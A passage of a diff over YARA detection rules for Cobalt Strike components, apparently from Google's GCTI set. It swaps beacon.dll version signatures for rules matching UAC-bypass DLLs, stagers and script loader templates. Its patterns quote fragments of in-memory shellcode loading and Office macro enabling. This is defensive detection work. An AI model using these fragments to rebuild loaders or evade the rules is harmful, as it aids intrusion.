"8c463d3122f3f79ff5d9b88e3d4f5ed14e6c581edfdfafba8a0c596c494ac1b1" + hash = "8f0da7a45945b630cd0dfb5661036e365dcdccd085bc6cff2abeec6f4c9f1035" + logic_hash = "31a108168489a24d1bc297d722741f3fd19abd1bed4c76d54967c73986d18123" score = 75 quality = 85 tags = "" strings: - $version_sig = { 83 F8 12 77 10 FF 24 } - $decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 } + $version_sig = { 41 B8 01 00 00 00 8B D0 49 8B CA 48 83 C4 28 E9 E8 AB FF FF + 8B D0 49 8B CA E8 1A EB FF FF 48 83 C4 28 } + $decoder = { 80 34 28 ?? 48 FF C0 48 3D 00 10 00 00 7C F1 } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_48 +rule GCTI_Cobaltstrike_Resources_Bypassuac_Dll_V1_49_To_V3_14_And_Sleeve_Bypassuac_Dll_V4_0_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Version 1.48" + description = "Cobalt Strike's resources/bypassuac(-x86).dll from v1.49 to v3.14 (32-bit version) and sleeve/bypassuac.dll from v4.0 to at least v4.4" author = "gssincla@google.com" - id = "dd15099f-ad19-58df-9ed4-ce66d7ee8540" + id = "614046b5-cf81-56a5-8824-b3a7e14a8ed5" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L146-L178" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuac_Dll_v1_49_to_v3_14_and_Sleeve_Bypassuac_Dll_v4_0_to_v4_x.yara#L17-L94" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "dd4e445572cd5e32d7e9cc121e8de337e6f19ff07547e3f2c6b7fce7eafd15e4" - logic_hash = "3f789eaf334c9bb3236d2834f38156aa92b22a5b674450977086378d195dd216" + hash = "91d12e1d09a642feedee5da966e1c15a2c5aea90c79ac796e267053e466df365" + logic_hash = "7d59c0286f1936e386519a919472d01581b68a8167c89bd3cd3108d45251119a" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F1 8B DA 83 F8 17 77 12 FF 24 } - $decode = { B1 ?? 30 88 [4] 40 3D A8 01 00 00 7C F2 } + $deleteFileCOM = { + A1 [4] + 6A 00 + 8B ?? + 5? + 5? + FF ?? 48 + 85 ?? + 75 ?? + A1 [4] + 5? + 8B ?? + FF ?? 54 + } + $copyFileCOM = { + A1 [4] + 6A 00 + FF [2] + 8B ?? + FF [5] + FF [5] + 5? + FF ?? 40 + 85 ?? + [2 - 6] + A1 [4] + 5? + 8B ?? + FF ?? 54 + } condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V1_49 +rule GCTI_Cobaltstrike_Resources_Template_X64_Ps1_V3_0_To_V4_X_Excluding_3_12_3_13 { meta: - description = "Cobalt Strike's resources/beacon.dll Version 1.49" + description = "Cobalt Strike's resources/template.x64.ps1, resources/template.hint.x64.ps1 and resources/template.hint.x32.ps1 from v3.0 to v4.x except 3.12 and 3.13" author = "gssincla@google.com" - id = "871e28c9-b580-5a32-8529-2290ded1a1b6" + id = "5a808113-aacb-56ca-b3ec-166c73c54b85" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L180-L211" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_x64_Ps1_v3_0_to_v4_x_excluding_3_12_3_13.yara#L17-L37" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "52b4bd87e21ee0cbaaa0fc007fd3f894c5fc2c4bae5cbc2a37188de3c2c465fe" - logic_hash = "935232d5ddccdc0401b4d911cdc73a48305347b495219c8c893615fe918f32f1" + hash = "ff743027a6bcc0fee02107236c1f5c96362eeb91f3a5a2e520a85294741ded87" + logic_hash = "80823b8590004686ebd83958cad16094ea2f6958a837d87934507531a00df77a" score = 75 - quality = 85 + quality = 81 tags = "" strings: - $version_sig = { 48 56 83 F8 1E 0F 87 23 01 00 00 FF 24 } - $decoder = { B1 ?? 90 30 88 [4] 40 3D A8 01 00 00 7C F2 } + $dda = "[AppDomain]::CurrentDomain.DefineDynamicAssembly" nocase + $imm = "InMemoryModule" nocase + $mdt = "MyDelegateType" nocase + $rd = "New-Object System.Reflection.AssemblyName('ReflectedDelegate')" nocase + $data = "[Byte[]]$var_code = [System.Convert]::FromBase64String(" nocase + $64bitSpecific = "[IntPtr]::size -eq 8" + $mandatory = "Mandatory = $True" condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_0_49 +rule GCTI_Cobaltstrike_Resources_Elevate_Dll_V3_0_To_V3_14_And_Sleeve_Elevate_Dll_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Version 2.0.49" + description = "Cobalt Strike's resources/elevate.dll signature for v3.0 to v3.14 and sleeve/elevate.dll for v4.x" author = "gssincla@google.com" - id = "087c584a-5ceb-536a-8842-53fbd668df54" + id = "170f62a2-ba4f-5be8-9ec5-402eb7bbde4e" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L213-L243" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Elevate_Dll_v3_0_to_v3_14_and_Sleeve_Elevate_Dll_v4_x.yara#L17-L68" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ed08c1a21906e313f619adaa0a6e5eb8120cddd17d0084a30ada306f2aca3a4e" - logic_hash = "3616579dabcfd0ba413d17b4fbd0da5313b9beca94f7bf8e41f05d6679b4a215" + hash = "6deeb2cafe9eeefe5fc5077e63cc08310f895e9d5d492c88c4e567323077aa2f" + logic_hash = "766a0a390ed8cefe43d82a054a9b2cfec7eced75e0d7ee10231215043577b75e" score = 75 quality = 85 tags = "" strings: - $version_sig = { 83 F8 22 0F 87 96 01 00 00 FF 24 } - $decoder = { B1 ?? EB 03 8D 49 00 30 88 [4] 40 3D 30 05 00 00 72 F2 } + $wnd_proc = { + 6A 00 + 6A 28 + 68 00 01 00 00 + 5? + C7 [5] 01 00 00 00 + FF ?? + 6A 00 + 6A 27 + 68 00 01 00 00 + 5? + FF ?? + 6A 00 + 6A 00 + 68 01 02 00 00 + 5? + FF ?? + } condition: - all of them + $wnd_proc } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_1_And_V2_2 +rule GCTI_Cobaltstrike_Resources_Bind_Bin_V2_5_Through_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 2.1 and 2.2" + description = "Cobalt Strike's resources/bind.bin signature for versions 2.5 to 4.x" author = "gssincla@google.com" - id = "384fb247-aae7-52e1-a45d-6bda0f80a04e" + id = "32f129c1-9845-5843-9e16-7d9af217b8e2" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L245-L276" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bind_Bin_v2_5_through_v4_x.yara#L17-L111" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "ae7a1d12e98b8c9090abe19bcaddbde8db7b119c73f7b40e76cdebb2610afdc2" - logic_hash = "eee3702d6fde08b8e9f5533f903fa33fb3da808a3b76ca43e4d5029f9ce91ad0" + hash = "3727542c0e3c2bf35cacc9e023d1b2d4a1e9e86ee5c62ee5b66184f46ca126d1" + logic_hash = "cf04e257590cf0673059348f5c15926918eb8aee40e864ae65979360aca80013" score = 75 quality = 85 tags = "" strings: - $version_sig = { 49 56 57 83 F9 24 0F 87 8A 01 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $apiLocator = { + 31 ?? + AC + C1 ?? 0D + 01 ?? + 38 ?? + 75 ?? + 03 [2] + 3B [2] + 75 ?? + 5? + 8B ?? 24 + 01 ?? + 66 8B [2] + 8B ?? 1C + 01 ?? + 8B ?? 8B + 01 ?? + 89 [3] + 5? + 5? + } + $ws2_32 = { + 5D + 68 33 32 00 00 + 68 77 73 32 5F + } + $listenaccept = { + 5? + 5? + 68 B7 E9 38 FF + FF ?? + 5? + 5? + 5? + 68 74 EC 3B E1 + } condition: - all of them + $apiLocator and $ws2_32 and $listenaccept } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_3 +rule GCTI_Cobaltstrike_Resources_Template_Sct_V3_3_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 2.3" + description = "Cobalt Strike's resources/template.sct signature for versions v3.3 to v4.x" author = "gssincla@google.com" - id = "aed092f1-fbb1-5efe-be8d-fb7c5aba1cde" + id = "9d2b1dfa-5f76-503f-9198-6ed0d039e0cb" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L278-L308" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Sct_v3_3_to_v4_x.yara#L17-L38" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "00dd982cb9b37f6effb1a5a057b6571e533aac5e9e9ee39a399bb3637775ff83" - logic_hash = "286d7ffa83634b82160788abaf1c5b319a09c4a1243af2401799f327be76ad75" + hash = "fc66cb120e7bc9209882620f5df7fdf45394c44ca71701a8662210cf3a40e142" + logic_hash = "8868445ced4945c469764b7f311d6cb11c99cf0f2d770113e5e617e0187a962c" score = 75 quality = 85 tags = "" strings: - $version_sig = { 49 56 57 83 F9 26 0F 87 A9 01 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $scriptletstart = "<scriptlet>" nocase + $registration = "<registration progid=" nocase + $classid = "classid=" nocase + $scriptlang = "<script language=\"vbscript\">" nocase + $cdata = "<![CDATA[" + $scriptend = "</script>" nocase + $antiregistration = "</registration>" nocase + $scriptletend = "</scriptlet>" condition: - all of them + all of them and @scriptletstart[1]<@registration[1] and @registration[1]<@classid[1] and @classid[1]<@scriptlang[1] and @scriptlang[1]<@cdata[1] } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_4 +rule GCTI_Cobaltstrike_Resources__Template_Vbs_V3_3_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 2.4" + description = "Cobalt Strike's resources/btemplate.vbs signature for versions v3.3 to v4.x" author = "gssincla@google.com" - id = "347a6b06-84a8-53ff-80a1-05fa1a48a412" + id = "62f35d02-1e4e-5651-b575-888ce06b8bdd" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-22" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L310-L340" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Vbs_v3_3_to_v4_x.yara#L17-L41" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "78c6f3f2b80e6140c4038e9c2bcd523a1b205d27187e37dc039ede4cf560beed" - logic_hash = "087ec6f585e90b84c00e746beb37cb8365cb7b4d07ebd0c48e3ba3d5df94dba2" + hash = "e0683f953062e63b2aabad7bc6d76a78748504b114329ef8e2ece808b3294135" + logic_hash = "c9df0e287eb0eacf7c6cfcf3f6d1043ae6f2fdacd3b22bd42ac71f4b0d7226ff" score = 75 - quality = 85 + quality = 83 tags = "" strings: - $version_sig = { 4A 56 57 83 FA 2F 0F 87 F9 01 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $ea = "Excel.Application" nocase + $vis = "Visible = False" nocase + $wsc = "Wscript.Shell" nocase + $regkey1 = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" nocase + $regkey2 = "\\Excel\\Security\\AccessVBOM" nocase + $regwrite = ".RegWrite" nocase + $dw = "REG_DWORD" + $code = ".CodeModule.AddFromString" + $ao = { 41 75 74 6f 5f 4f 70 65 6e } + $da = ".DisplayAlerts" condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V2_5 +rule GCTI_Cobaltstrike_Resources_Template_Py_V3_3_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 2.5" + description = "Cobalt Strike's resources/template.py signature for versions v3.3 to v4.x" author = "gssincla@google.com" - id = "a89f9239-099c-5b97-b1df-e8ce2b95ea52" + id = "16aef9a9-b217-5462-93dc-f6273c99ddd0" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L342-L372" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Template_Py_v3_3_to_v4_x.yara#L17-L36" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "d99693e3e521f42d19824955bef0cefb79b3a9dbf30f0d832180577674ee2b58" - logic_hash = "f2d0ca1414a60bf855543d99777ae5e83c451db41aba5e255e4c10b1e0bb7b47" + hash = "d5cb406bee013f51d876da44378c0a89b7b3b800d018527334ea0c5793ea4006" + logic_hash = "3c26cea4b8f2b200bf58e939ae9ead7a7339d4ec0de8c72b3d9c7da897600081" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F2 83 F8 3A 0F 87 6E 02 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $arch = "platform.architecture()" + $nope = "WindowsPE" + $alloc = "ctypes.windll.kernel32.VirtualAlloc" + $movemem = "ctypes.windll.kernel32.RtlMoveMemory" + $thread = "ctypes.windll.kernel32.CreateThread" + $wait = "ctypes.windll.kernel32.WaitForSingleObject" condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_0 +rule GCTI_Cobaltstrike_Resources_Httpsstager64_Bin_V3_2_Through_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.0" + description = "Cobalt Strike's resources/httpsstager64.bin signature for versions v3.2 to v4.x" author = "gssincla@google.com" - id = "132a1be8-f529-5141-ba03-fdf6df3d55d4" + id = "c16e73fc-484a-5f7e-8127-d85a0254d842" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L374-L404" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Httpsstager64_Bin_v3_2_through_v4_x.yara#L17-L90" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "30251f22df7f1be8bc75390a2f208b7514647835f07593f25e470342fd2e3f52" - logic_hash = "951f1b52c14010261022f9f920d53d3c1e88f41461798a23e72083c981f9de76" + hash = "109b8c55816ddc0defff360c93e8a07019ac812dd1a42209ea7e95ba79b5a573" + logic_hash = "4889a23c1f2780044b9fb2a0207676d57e82e6c1275614b684a5a9cbe984b761" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F2 83 F8 3C 0F 87 89 02 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $apiLocator = { + 48 [2] + AC + 41 [2] 0D + 41 [2] + 38 ?? + 75 ?? + 4C [4] + 45 [2] + 75 ?? + 5? + 44 [2] 24 + 49 [2] + 66 [4] + 44 [2] 1C + 49 [2] + 41 [3] + 48 + } + $InternetSetOptionA = { + BA 1F 00 00 00 + 6A 00 + 68 80 33 00 00 + 49 [2] + 41 ?? 04 00 00 00 + 41 ?? 75 46 9E 86 + } condition: - all of them + $apiLocator and $InternetSetOptionA } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_1 +rule GCTI_Cobaltstrike_Resources_Covertvpn_Dll_V2_1_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.1" + description = "Cobalt Strike's resources/covertvpn.dll signature for version v2.2 to v4.4" author = "gssincla@google.com" - id = "aa511dee-69ea-53bd-be90-d2d03d08c550" + id = "a65b855c-5703-5b9f-bb57-da8ebf898f9b" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L406-L461" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Covertvpn_Dll_v2_1_to_v4_x.yara#L17-L120" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "4de723e784ef4e1633bbbd65e7665adcfb03dd75505b2f17d358d5a40b7f35cf" - logic_hash = "2d91add3aefe69b4525f93f7ea9f2fcbd7a6c506a224997ff73a2eeef63a8cd4" + hash = "0a452a94d53e54b1df6ba02bc2f02e06d57153aad111171a94ec65c910d22dcf" + logic_hash = "1f6e4254fdfd4f9b13c2000333aabbb7da90d2df7ee1b12faa6ea3c066351468" score = 75 quality = 85 tags = "" strings: - $version_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $dropComponentsAndActivateDriver_prologue = { + 5? + 68 [4] + 68 [4] + C7 [3-5] 00 00 00 00 + FF 15 [4] + 50 + FF 15 [4] + 8B ?? + 85 ?? + 74 ?? + 8D [3-5] + 5? + FF 15 [4] + 50 + } + $dropFile = { + 6A 00 + 5? + E8 [4] + 83 C4 08 + 83 F8 FF + 74 ?? + 5? + [0-5] + E8 [4] + 83 C4 ?? + [0-2] + 6A 00 + 68 80 01 00 00 + 6A 02 + 6A 00 + 6A 05 + 68 00 00 00 40 + 5? + FF 15 [4] + 8B ?? + 83 ?? FF + 75 ?? + FF 15 [4] + 5? + } + $nfp = "npf.sys" nocase + $wpcap = "wpcap.dll" nocase condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_2 +rule GCTI_Cobaltstrike_Resources_Bypassuactoken_Dll_V3_11_To_V3_14 { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.2" + description = "Cobalt Strike's resources/bypassuactoken.dll from v3.11 to v3.14 (32-bit version)" author = "gssincla@google.com" - id = "3ccbc0f2-241c-5c10-8930-4a3d264d3b57" + id = "b9f25fa5-bd1d-5ba0-9b1d-bb97e1dbf76b" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L463-L528" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Bypassuactoken_Dll_v3_11_to_v3_14.yara#L17-L151" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "b490eeb95d150530b8e155da5d7ef778543836a03cb5c27767f1ae4265449a8d" - logic_hash = "e1fe0d58d86ad8c845d65608314007ce08e3e524fb92cdb33ddae860c640e3e9" + hash = "df1c7256dfd78506e38c64c54c0645b6a56fc56b2ffad8c553b0f770c5683070" + logic_hash = "fe0780b7f4c16b55cfa00ea7de4da8ce349ec8a72de763b72e816ebc8e934b6d" score = 75 quality = 85 tags = "" - rs2 = "a93647c373f16d61c38ba6382901f468247f12ba8cbe56663abb2a11ff2a5144" strings: - $version_sig = { 48 57 8B F2 83 F8 3D 0F 87 83 02 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } - $version3_1_sig = { 55 8B EC 83 EC 58 A1 [4] 33 C5 89 45 FC E8 DF F5 FF FF 6A 50 8D 45 A8 50 FF 15 [4] 8D 45 ?? 50 FF 15 [4] 85 C0 74 14 8B 40 0C 83 38 00 74 0C 8B 00 FF 30 FF 15 [4] EB 05 B8 [4] 8B 4D FC 33 CD E8 82 B7 00 00 C9 } + $isHighIntegrityProcess = { + 5? + 5? + 5? + 8B ?? + 6A 19 + 5? + FF 15 [4] + 85 C0 + 75 ?? + FF 15 [4] + 83 ?? 7A + 75 ?? + FF [2] + 5? + FF 15 [4] + 8B ?? + 8D [2] + 5? + FF [2] + 5? + 6A 19 + 5? + FF 15 [4] + 85 C0 + 74 ?? + FF ?? + FF 15 [4] + 8A ?? + FE C8 + 0F B6 C0 + 5? + FF ?? + FF 15 [4] + B? 01 00 00 00 + 5? + 81 ?? 00 30 00 00 + } + $executeTaskmgr = { + 6A 3C + 8D ?? C4 + 8B ?? + 6A 00 + 5? + 8B ?? + E8 [4] + 83 C4 0C + C7 [2] 3C 00 00 00 + 8D [2] + C7 [2] 40 00 00 00 + C7 [6] + C7 [2] 00 00 00 00 + 5? + C7 [2] 00 00 00 00 + C7 [6] + C7 [2] 00 00 00 00 + FF 15 [4] + FF 75 FC + } condition: - $version_sig and $decoder and not $version3_1_sig + all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_3 +rule GCTI_Cobaltstrike_Resources_Smbstager_Bin_V2_5_Through_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.3" + description = "Cobalt Strike's resources/smbstager.bin signature for versions 2.5 to 4.x" author = "gssincla@google.com" - id = "7cce26c9-1403-535f-bd9d-19667c7e313c" + id = "074b7d83-e3d8-541c-804b-2417c21f54d5" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L530-L560" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Smbstager_Bin_v2_5_through_v4_x.yara#L17-L95" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "158dba14099f847816e2fc22f254c60e09ac999b6c6e2ba6f90c6dd6d937bc42" - logic_hash = "f9b9b669aacc156a4e07eab0c6a638f9b9d828e018d1db89e9e2c922641744ac" + hash = "946af5a23e5403ea1caccb2e0988ec1526b375a3e919189f16491eeabc3e7d8c" + logic_hash = "b0f6535069df16a64de44ca0638ec060c1ff264a7820c94710d61ca7e8474450" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F1 83 F8 41 0F 87 F0 02 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 10 06 00 00 72 F1 } + $apiLocator = { + 31 ?? + AC + C1 ?? 0D + 01 ?? + 38 ?? + 75 ?? + 03 [2] + 3B [2] + 75 ?? + 5? + 8B ?? 24 + 01 ?? + 66 8B [2] + 8B ?? 1C + 01 ?? + 8B ?? 8B + 01 ?? + 89 [3] + 5? + 5? + } + $smb = { 68 C6 96 87 52 } + $smbstart = { + 6A 40 + 68 00 10 00 00 + 68 FF FF 07 00 + 6A 00 + 68 58 A4 53 E5 + } condition: - all of them + $apiLocator and $smb and $smbstart } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_4 +rule GCTI_Cobaltstrike__Resources_Browserpivot_Bin_V1_48_To_V3_14_And_Sleeve_Browserpivot_Dll_V4_0_To_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.4" + description = "Cobalt Strike's resources/browserpivot.bin from v1.48 to v3.14 and sleeve/browserpivot.dll from v4.0 to at least v4.4" author = "gssincla@google.com" - id = "58a34ab6-c061-59a2-b929-8519d3d844e7" + id = "55086544-6684-526b-914f-505a562be458" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Beacon_Dll_All_Versions_MemEnabled.yara#L562-L592" + source_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/YARA/CobaltStrike/CobaltStrike__Resources_Browserpivot_Bin_v1_48_to_v3_14_and_Sleeve_Browserpivot_Dll_v4_0_to_v4_x.yara#L17-L60" license_url = "https://github.com/chronicle/GCTI/blob/1c5fd42b1895098527fde00c2d9757edf6b303bb/LICENSE" - hash = "5c40bfa04a957d68a095dd33431df883e3a075f5b7dea3e0be9834ce6d92daa3" - logic_hash = "f3372bc538092e30c62d9599f76f2115dc73faf7a5fd6f86c8d4cfaa35473810" + hash = "12af9f5a7e9bfc49c82a33d38437e2f3f601639afbcdc9be264d3a8d84fd5539" + logic_hash = "416554d31c105fd96aeaef508847efe2889590909c8d0025e3862e5b24078131" score = 75 quality = 85 tags = "" strings: - $version_sig = { 48 57 8B F1 83 F8 42 0F 87 F0 02 00 00 FF 24 } - $decoder = { 80 B0 [4] ?? 40 3D 00 10 00 00 7C F1 } + $socket_recv = { + FF [1-5] + 83 ?? FF + 74 ?? + 85 C0 + (74 | 76) ?? + 03 ?? + 83 ?? 02 + 72 ?? + 80 ?? 3E FF 0A + 75 ?? + 80 ?? 3E FE 0D + } + $fmt = "%1024[^ ] %8[^:]://%1016[^/]%7168[^ ] %1024[^ ]" condition: all of them } -rule GCTI_Cobaltstrike_Resources_Beacon_Dll_V3_5_Hf1_And_3_5_1 +rule GCTI_Cobaltstrike_Resources_Dnsstager_Bin_V1_47_Through_V4_X { meta: - description = "Cobalt Strike's resources/beacon.dll Versions 3.5-hf1 and 3.5.1 (3.5.x)" + description = "Cobalt Strike's resources/dnsstager.bin signature for versions 1.47 to 4.x" author = "gssincla@google.com" - id = "1532596e-be0e-58c2-8d3b-5120c793d677" + id = "e1b0e368-9bcf-5d9b-b2b3-8414742f213e" date = "2022-11-18" - modified = "2023-12-04" + modified = "2022-11-19" reference = "https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse" - source_url = 